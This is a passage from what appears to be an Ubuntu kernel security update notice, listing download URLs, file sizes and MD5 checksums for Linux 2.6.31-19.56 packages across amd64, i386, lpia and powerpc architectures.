http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb
  Size/MD5: 62161518 9d3f3f79b9f14db8bd3dc68594eb8c8c

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb
  Size/MD5:   603212 951db7e930eefc5fff9017c56badfb6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb
  Size/MD5: 18660056 e39dda7f87b093e927c34a928b842c7a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   221398 682a7dab5b571a7b2fd31f19daf724c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    15536 55206db30b20aea4d7da38b342fc095d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    52128 1cde23d38ba6908e1123951ef4bc3c69
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    44828 94402e34a45cf232ae86f3cc08bf7f4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    50072 65e128949b6f525d9028187fe1e7cc37
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    92518 338960088cec6b9b25ef2a96e96f3ebc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    37776 452d9c073d191ec2be1cad3aceb34490
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   537676 6bb8167794701151c613afe28a5c62c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   130666 ff5cf8923b89d0fa4b5c3c4a61ef93f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    53846 ffdc544c68e862a0a3038c99ac2d73a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   310118 c2092f9a83a4f59145005f2c451d304b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  4353666 3a04bb875ae70561075d05d5bb208977
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb
  Size/MD5:   694766 85017cb531a49ea743cb7b30341b5ffa
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb
  Size/MD5:   694938 550a64d6d54ee5f34f1fb9eefbd4cc3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb
  Size/MD5: 28924984 3001e6d36f6bf76621997bdbeb864234
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb
  Size/MD5: 28885946 ff6296f4c684dd9facb011fc51b0b6f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb
  Size/MD5: 11740736 287948976d92a7cae832a34ce33a99b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb
  Size/MD5:   743052 35cb9d5d80b77a2586d08ffb65d3212a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   168272 fc4758b6b91802971538d3a3c519056d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   202768 73cfe4be43d350582d171ff0e178b6b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    27268 ae850a5e0ba4381a290b8f21ff88737f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   311688 3dab8c023e4aad0df74c5193aeaca49b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  2282064 f09b0e8828effab3770bfc1da159a8f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   158666 6765112bf6fed248c08465e47b4dab00
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   203112 fed91a4bc3d356a5a9bb1c6110337413
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   161072 faec6563ccef41e925482b36619fca7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    38056 505cbeb1fdbf55eea7664a19dcedc11f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:     5762 a3ba57f83594477b27886cb3f4bd1b0d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    73750 53978367ed22b3daba246878064b72c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    22240 8a1036af3dacffb432813cc8422f6ae8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:     9548 f1e71c2129cc33f1ff139401b7b81547
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    39844 48e4aa79753fdb3ce1877ca1817b9fc6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    23484 f1be46cb2947ebe6b6d2e5b571d71a35
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  1389556 2ba51ea53e5454f75c8b39f21481e45d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    47382 89f1dff9282f3c667cf1b8c2bc41353c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    51636 41311bd8c8459ba04789539733e6ff5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   128972 9697c034ed2bb74b5d18c5ae31fe1af0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    15814 8f46e8ddd6cac16dbdbc7c89cc94bee0

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb
  Size/MD5:   573528 fa913abed6caeb5c33eb2167f730956f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb
  Size/MD5: 17943372 803487f6122441604ec3062e7bb98228
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   198832 3282a330510666a582f6b8c0269d2f53
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    32458 03e2d90ce28677b7956fa2a72726d02e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    49938 c0d1953d9212f1569f04e8c8ba0db7ca
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    42118 db5bcc80727cd1013bc8393df2a88e4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    45954 2d497ad958e7e7fc1b57ce51ff6b3570
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    87386 8e3ab58cf14ac0e97a334a65ae3e42ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    33754 bdbf52c3d681cca0ecdced183d2d37c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   534176 5f166aa72d31a95df7cdb60abe4a0fc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   128172 821c97524ce74e0685b135140c5261d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    49748 9423b0562b984b85856d219d7b67fa27
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   295726 0736ef03d01a5e5e4fdf284ad2be5409
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  4185460 831a6068ef18d08ff697df14dead1668
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb
  Size/MD5:   674832 6c28f2a428900b7c3ecd857dd2363150
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb
  Size/MD5:   674164 daade678beff67e96da61f42286bb8d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb
  Size/MD5:   674252 0786c96b6d902a71c6f1a2e5aa202345
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb
  Size/MD5: 28775482 99e9b99d437aa88ec42e838367ca0c3b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb
  Size/MD5: 28938194 19d1d147a9e9dfb49fcd30b9d065d289
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb
  Size/MD5: 28836780 00047de0d649be8b91c813fe7ee482b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb
  Size/MD5: 11193984 1848c77671f6d9129f990e1a0a9940d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb
  Size/MD5:   743050 af6030dae8f05d7ef583ee7d6f31be8b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   172774 c11dd36baffeccf283ce48e122d7c791
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   186104 072e07c277b4f37611b21aad4390ccb0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    28372 82c8b14ef6982a48d3a8459d56ede43c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   292792 6c99c3b65ff7b159af94edf70358cb4a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  2400232 94729dcb0c5adb15ded7b3302c4005eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   142004 9e43481b4e46409d8e711a628ce5e40a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   189566 83afe6de56cab613b4f890723a82a6b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   148522 b96767af921427e880579659ba7b757a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    35306 a6a1cbe7a75490632f24cad479916315
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:     6842 86b286685eabaf8b6d28d3f922249503
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    86058 c014cfa81ab99a01793d25b995c7d75f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    46424 d525bcf1a39f6a21f09d52d24e6a0eb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:     8916 f9efb7f192c3cc22c14df58803a64dfc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    36282 1d843fa9ef5beed8582f2924d0b53bcc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    21660 3ad0b4572c12885957a3b753fc3b9fe3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  1495010 630f37fe420a74a22b4ca2eba4960999
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    44088 fddf56b0285ec3d0e6fc61e0fe8b86e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    48484 2614a20d6d57892a8789091eeeaa67b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   117810 ff004889bca11286287a59c36fa24c0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    14526 4c9cb3d5598c843bf5b90ddf0292d3c1

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   198810 76156647956f29c9e519aeac038c63bb
http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    32452 9a5dd5fe15dda0be28f7afd966e89af9
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    49936 31c4008b50016b2a6c3a90703f2becbb
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    42148 931518b24b123d3749719c35b2b23759
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    45950 297c686f52a35049b3b2c87a96aebf68
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    87366 ec3f16cc0aeeef91b8c887ff347b6b0a
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    33750 a29ddd339c071c5b948c96e30f36f650
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   534366 b15b19f3e6c581d22514700dbd6502d8
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   128202 3d0f559a80187074bb210e3dae3bbfa0
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    49732 41abb7e30f0bdac62c5cd064c4b0ac3e
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   295732 12e912ce1f15d580960e7956de0c4ae0
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  4186814 7c18e86a3f5a5a985488ad67718887f9
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb
  Size/MD5:   674880 5dd2779cd5be613c330b7dc35410f271
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb
  Size/MD5: 28831528 8eaab1870eda62e8ee231e429c361455
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb
  Size/MD5:   742994 99d2d0609d9032e2810e19c92fc92834
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   172836 8b15eb5579853f45dc49055351df4225
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   186092 0eb0ceb5c23748d829f3e1d7977a35be
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    28366 0301ac544cf27b3dce660787d7575804
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   292736 16e84844c99e73b4e00419c38d78db3d
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  2400366 43dda8f1a10775e382e7a328381265db
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   141998 930123e6b57798468d7085ae9f549150
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   189564 8d6e18aedb4b970a3643207b96589863
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   148506 78efdbf1323c68be564ad06205842cb6
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    35300 054cf95e7af87d6f744b69eb8166f275
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:     6828 5dbf32d40e88f471614e5cf286670e8f
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    86054 f24e7eaa3608985960e54a9048a24fb6
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    46410 80945eba79f53965effd546d23a8560b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:     8906 e1c6021a615a4363dde2cf4a893fa53b
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    36270 eb2848e19ec2351b9102bc640e546991
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    21660 cfb271e26dfd127871f5d27547e0a7ba
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:  1494736 44113d529e3f4d3828f8719facd86370
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    44068 98817942a8188bd9281def20a1d327bb
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    48474 ebc9e58b5f98182006d6e3bb9c5ce179
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:   117786 9b864dfc32d19a8cf2d61a68894835e9
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb
  Size/MD5:    14524 9ad51e3871197eb84b193bd9a3b29ec2

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   321488 509ad8549565d0d87fe246df5b26c7af
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   263628 b7028cc16ec749cc2fdd86e985c7bc6a
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    58850 3e2f18df29a75debc326e5919c9c13da
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    67040 8fdde64943d01e5c6a372424d3d24a03
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    45914 6a21bb6fc6dce2767be6f974ffdab524
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    51296 4c928d4f04bf96f5cdc5ccf7d3a60c81
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    90684 eac2ea55da023924723593afffbb5d2c
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   105146 c407a156a5e56f284fa682d87d2ed50e
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    39492 38f377d5a0bdbbbb642545aa6d7f641c
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    39270 47f890e2a1418595d92858350aa16475
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   580998 825045ff82a442eaf1a21a5448b0cefb
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   626388 b56b5416b642ba57471e6e125b99a32f
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   149292 930001a305b0f78060f3472fe46cde00
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   147332 ef6994c30f19462a7fc0cb7cd8f4dacc
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    79750 75c6da2308e05334f89f62917aee5b3d
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    84136 caf2a7e924b03340e579e9bdc0a7ba50
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   402954 9fc3d4860f5c32aff3ac252379938fef
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   342516 5737df8ea2adfc45ecae9d322931187a
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  3813204 3ac91a51b3525bfbb0f6166fc140d7db
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  5193132 54dce7348221bcc93bbc01512d553a16
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb
  Size/MD5:   784762 523b94315bff20137df79c5308abd5b7
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb
  Size/MD5:   801042 2a8e55b23ad4dc09ee3cbb2fdc23cc28
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb
  Size/MD5:   783708 185ba99656f4fa37874e0241e9f25dbb
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb
  Size/MD5: 24820746 adc5365726ba88565ad89953707bd012
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb
  Size/MD5: 25829918 fc82da730c6d730c5a4ac87d30594749
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb
  Size/MD5: 24656226 7791f88107e97c5419f0e2d2f850c38e
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb
  Size/MD5:   728146 1dabe36864839475aab9293825cfc3e4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   271924 8fb200d91f158f9b0eb209df5a5ffcd4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   294610 317f7d34e3cd0ac823fcc5d48bcc9a7f
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   210546 041508a9555e18e2b8b4cab41b26f397
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   216984 845e2e452ef869aa3b39ea47bfa0280b
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    25798 19a7cae7e4f693c269f54dc0f2762f33
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    28984 419926b33e2b573f8d3ccaa5ade657f1
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
